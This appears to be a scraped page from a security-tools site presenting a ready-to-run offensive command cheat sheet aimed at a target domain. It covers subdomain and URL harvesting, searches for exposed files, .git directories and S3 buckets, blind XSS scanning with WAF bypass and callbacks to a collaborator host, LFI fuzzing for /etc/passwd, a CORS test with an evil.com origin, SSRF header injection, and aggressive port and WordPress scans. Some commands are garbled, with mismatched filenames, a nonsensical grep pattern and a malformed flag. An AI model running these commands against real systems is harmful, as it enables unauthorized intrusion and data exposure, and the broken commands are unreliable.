D3F4ULTZ

system@d3f4ultz:~

Resource Statistics

Comprehensive collection of security resources and tools

Docker Tools

GitHub Tools

Commands

Extensions

Social Templates

Wordlists

Live Cameras

Security Command Center

Access and customize security testing commands for your target domain.

Your Information

Public IP:

Timezone:

Local Time:

Browser:

Device:

Operating System:

Subdomain Enumeration

Basic Subdomain Discovery

Discovers subdomains using subfinder with recursive enumeration and saves results to a file.

example.com

subfinder -d example.com -all -recursive > subexample.com.txt

Live Subdomain Filtering

Filters discovered subdomains using httpx and saves the alive ones to a file.

example.com

cat subexample.com.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 > subexample.coms_alive.txt

Subdomain Takeover Check

Checks for subdomain takeover vulnerabilities using subzy.

example.com

subzy run --targets subexample.coms.txt --concurrency 100 --hide_fails --verify_ssl

URL Collection

Passive URL Collection

Collects URLs from various sources and saves them to a file.

example.com

katana -u subexample.coms_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -o allurls.txt

Advanced URL Fetching

Collects URLs from various sources and saves them to a file.

example.com

GAU URL Collection

Collects URLs using GAU and saves them to a file.

example.com

Sensitive Data Discovery

Sensitive File Detection

Detects sensitive files on the web server.

example.com

cat allurls.txt | grep -E ".xls|.xml|.xlsx|.json|.pdf|.sql|.doc|.docx|.pptx|.txt|.zip|.tar.gz|.tgz|.bak|.7z|.rar|.log|.cache|.secret|.db|.backup|.yml|.gz|.config|.csv|.yaml|.md|.md5"

Information Disclosure Dork

Searches for information disclosure vulnerabilities using a dork.

example.com

site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)

Git Repository Detection

Detects Git repositories on the web server.

example.com

cat example.coms.txt | grep "SUCCESS" | gf urls | httpx-toolkit -sc -server -cl -path "/.git/" -mc 200 -location -ms "Index of" -probe

Information Disclosure Scanner

Checks for information disclosure vulnerabilities using a scanner.

example.com

echo https://example.com | gau | grep -E ".(xls|xml|xlsx|json|pdf|sql|doc|docx|pptx|txt|zip|tar.gz|tgz|bak|7z|rar|log|cache|secret|db|backup|yml|gz|config|csv|yaml|md|md5|tar|xz|7zip|p12|pem|key|crt|csr|sh|pl|py|java|class|jar|war|ear|sqlitedb|sqlite3|dbf|db3|accdb|mdb|sqlcipher|gitignore|env|ini|conf|properties|plist|cfg)$"

AWS S3 Bucket Finder

Searches for AWS S3 buckets associated with the target.

example.com

s3scanner scan -d example.com

API Key Finder

Searches for exposed API keys and tokens in JavaScript files.

example.com

XSS Testing

XSS Hunting Pipeline

Collects XSS vulnerabilities using various tools and saves them to a file.

example.com

XSS with Dalfox

Uses Dalfox to scan for XSS vulnerabilities.

example.com

cat xss_params.txt | dalfox pipe --blind https://your-collaborator-url --waf-bypass --silence

Stored XSS Finder

Finds potential stored XSS vulnerabilities by scanning forms.

example.com

DOM XSS Detection

Detects potential DOM-based XSS vulnerabilities.

example.com

cat js_files.txt | Gxss -c 100 | sort -u | dalfox pipe -o dom_xss_results.txt

LFI Testing

LFI Methodology

Tests for Local File Inclusion (LFI) vulnerabilities using various methods.

example.com

echo "https://example.com/" | gau | gf lfi | uro | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | xargs -I{} ffuf -u {} -w payloads/lfi.txt -c -mr "root:(x|*|$[^:]*):0:0:" -v

CORS Testing

Basic CORS Check

Checks the Cross-Origin Resource Sharing (CORS) policy of a website.

example.com

curl -H "Origin: http://example.com" -I https://example.com/wp-json/

CORScanner

Fast CORS misconfiguration scanner that helps identify potential CORS vulnerabilities.

example.com

python3 CORScanner.py -u https://example.com -d -t 10

CORS Nuclei Scan

Uses Nuclei to scan for CORS misconfigurations across multiple domains.

example.com

cat example.coms.txt | httpx -silent | nuclei -t nuclei-templates/vulnerabilities/cors/ -o cors_results.txt

CORS Origin Reflection Test

Tests for origin reflection vulnerability in CORS configuration.

example.com

curl -H "Origin: https://evil.com" -I https://example.com/api/data | grep -i "access-control-allow-origin: https://evil.com"

WordPress Scanning

Aggressive WordPress Scan

Scans a WordPress website for vulnerabilities and saves the results to a file.

example.com

wpscan --url https://example.com --disable-tls-checks --api-token YOUR_TOKEN -e at -e ap -e u --enumerate ap --plugins-detection aggressive --force

Network Scanning

Naabu Scan

Scans for open ports and services using Naabu.

example.com

naabu -list ip.txt -c 50 -nmap-cli 'nmap -sV -SC' -o naabu-full.txt

Nmap Full Scan

Performs a full port scan using Nmap.

example.com

nmap -p- --min-rate 1000 -T4 -A example.com -oA fullscan

Masscan

Scans for open ports and services using Masscan.

example.com

masscan -p0-65535 example.com --rate 100000 -oG masscan-results.txt

Parameter Discovery

Arjun Passive

Passively discovers parameters using Arjun.

example.com

arjun -u https://example.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"

Arjun Wordlist

Uses Arjun to discover parameters using a custom wordlist.

example.com

arjun -u https://example.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers "User-Agent: Mozilla/5.0"

JavaScript Analysis

JS File Hunting

Collects JavaScript files from a website and analyzes them.

example.com

echo example.com | katana -d 5 | grep -E ".js$" | nuclei -t /path/to/nuclei-templates/http/exposures/ -c 30

JS File Analysis

Analyzes collected JavaScript files.

example.com

cat alljs.txt | nuclei -t /path/to/nuclei-templates/http/exposures/

Content Type Filtering

Content Type Check

Checks the content type of URLs.

example.com

echo example.com | gau | grep -Eo '(\/[^\/]+)\.(php|asp|aspx|jsp|jsf|cfm|pl|perl|cgi|htm|html)$' | httpx -status-code -mc 200 -content-type | grep -E 'text/html|application/xhtml+xml'

JavaScript Content Check

Checks for JavaScript content in URLs.

example.com

echo example.com | gau | grep '\.js-php-jsp-other extens$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'

Shodan Dorks

SSL Certificate Search

Searches for SSL certificates using Shodan.

example.com

Ssl.cert.subject.CN:"example.com" 200

FFUF Request File Method

LFI with Request File

Uses FFUF to bruteforce LFI vulnerabilities using a request file.

example.com

ffuf -request lfi -request-proto https -w /root/wordlists/offensive\ payloads/LFI\ payload.txt -c -mr "root:"

XSS with Request File

Uses FFUF to bruteforce XSS vulnerabilities using a request file.

example.com

ffuf -request xss -request-proto https -w /root/wordlists/xss-payloads.txt -c -mr "<script>alert('XSS')</script>"

Advanced Techniques

XSS/SSRF Header Testing

Tests for XSS and SSRF vulnerabilities using various methods.

example.com

cat example.coms.txt | assetfinder --subs-only| httprobe | while read url; do xss1=$(curl -s -L $url -H 'X-Forwarded-For: xss.yourburpcollabrotor'|grep xss) xss2=$(curl -s -L $url -H 'X-Forwarded-Host: xss.yourburpcollabrotor'|grep xss) xss3=$(curl -s -L $url -H 'Host: xss.yourburpcollabrotor'|grep xss) xss4=$(curl -s -L $url --request-target http://burpcollaborator/ --max-time 2); echo -e "\e[1;32m$url\e[0m""\n""Method[1] X-Forwarded-For: xss+ssrf => $xss1""\n""Method[2] X-Forwarded-Host: xss+ssrf ==> $xss2""\n""Method[3] Host: xss+ssrf ==> $xss3""\n""Method[4] GET http://xss.yourburpcollabrotor HTTP/1.1 ""\n";done